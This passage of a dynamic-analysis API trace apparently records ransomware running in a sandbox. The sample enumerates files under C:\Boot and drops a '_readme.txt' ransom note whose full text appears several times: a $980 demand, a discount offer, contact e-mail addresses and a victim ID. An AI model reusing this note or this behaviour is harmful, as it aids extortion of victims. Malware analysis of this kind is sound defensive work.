hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.213] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0184.213] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.214] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.214] PathFindFileNameW (pszPath="") returned="" [0184.214] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0184.214] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0184.214] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.215] FreeLibrary (hLibModule=0x759a0000) returned 1 [0184.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.215] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0184.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.215] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0184.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0184.216] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.216] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0184.226] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0184.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0184.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.227] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*" (normalized: "c:\\boot\\pt-pt\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0184.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.228] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.228] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.228] PathFindExtensionW (pszPath="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned=".mui" [0184.228] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.229] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.229] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0184.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0184.230] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0184.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0184.230] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0184.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 